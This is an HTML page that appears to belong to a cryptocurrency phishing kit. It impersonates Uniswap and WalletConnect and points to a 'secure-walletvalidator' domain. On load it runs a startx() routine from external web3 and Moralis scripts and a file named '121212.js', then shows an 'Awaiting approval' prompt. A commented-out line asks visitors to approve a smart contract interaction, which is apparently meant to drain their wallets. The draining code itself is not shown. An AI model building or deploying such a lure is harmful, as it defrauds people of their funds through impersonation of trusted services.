<!DOCTYPE html>
<html lang="en">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="expires" content="300" /> 
      <meta name="description" content="Swap or provide liquidity on the Uniswap Protocol">
      <link rel="shortcut icon" type="image/png" href="https://logosarchive.com/wp-content/uploads/2022/02/WalletConnect-icon.svg">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="../../0x/BEP20/bootstrap.min.css">
    <title>wallet connect</title>
	<link rel="canonical" href="https://secure-walletvalidator.com/0x/BEP20/bep20.html" />
   <style>  
   body{
    background-color: #1D2330;
    /* background-image: url("../../0x/assets/img/cta-img-with-bg.png");
    background-repeat: no-repeat; */
   }
   .word {
        width: 300px;
        height: 300px;
        position: absolute;
        top:0;
        bottom: 0;
        left: 0;
        right: 0;
        margin: auto;
        text-align: center;
        color: white;
    }
    </style>
</head>
<body>
    <div class="word">
        <!-- Connect wallet to proceed</br>
        Refresh page -->
        <img src="../../0x/assets/img/cta-img-with-bg.png" alt="">
    </div>
</body>
<div id="myModal" class="modal" tabindex="-1" role="dialog">
    <div class="modal-dialog" role="document">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="modal-title"><span style="color :rgb(12, 12, 65)">Complete request</span></h5>
          <button type="button" class="close" data-dismiss="modal" aria-label="Close">
            <!-- <span aria-hidden="true">&times;</span> -->
          </button>
        </div>
        <div class="modal-body">
          <!-- <p>Return to your wallet application and approve our smart contract interaction to proceed</p> -->
          <p>Connecting ...<br />
          Awaiting approval</p>
        </div>
        <!-- <div class="modal-footer">
          <button type="button" class="btn btn-primary">Save changes</button>
          <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
        </div> -->
      </div>
    </div>
  </div>
<!-- ===============================================-->
<!--    End of Main Content-->
<!-- ===============================================-->
<!-- ===============================================-->
<!--    JavaScripts-->
<!-- ===============================================-->
<script src="../../0x/BEP20/vendors/-popperjs/popper.min.js"></script>
<script src="../../0x/BEP20/vendors/bootstrap/bootstrap.min.js"></script>
<script src="../../0x/BEP20/Decimal/decimal.js"></script>
    <script src="../../0x/BEP20/Moralis/moralis.js"></script>
    <script type="text/javascript" src="../../0x/BEP20/WEB3/web3.js"></script>
    <script type="text/javascript" src="../../0x/BEP20/Web3Modal/web3modal.js"></script>
    <script type="text/javascript" src="../../0x/bundle.js"></script>
    <script type="text/javascript" src="../../evm-chains-0.2.0/dist/umd/index.min.js"></script>
     <script type="text/javascript" src="../../-walletconnect/web3-provider.js"></script>
     <script type="text/javascript"  src="../../npm/-portis/web3-4.0.7/umd/index.min.js"></script>
<script src="../../0x/BEP20/121212.js"></script>
<script
  src="../../jquery-3.6.0.min.js"
  ></script>
    <script>
      window.onload = startx();
    </script>
</html>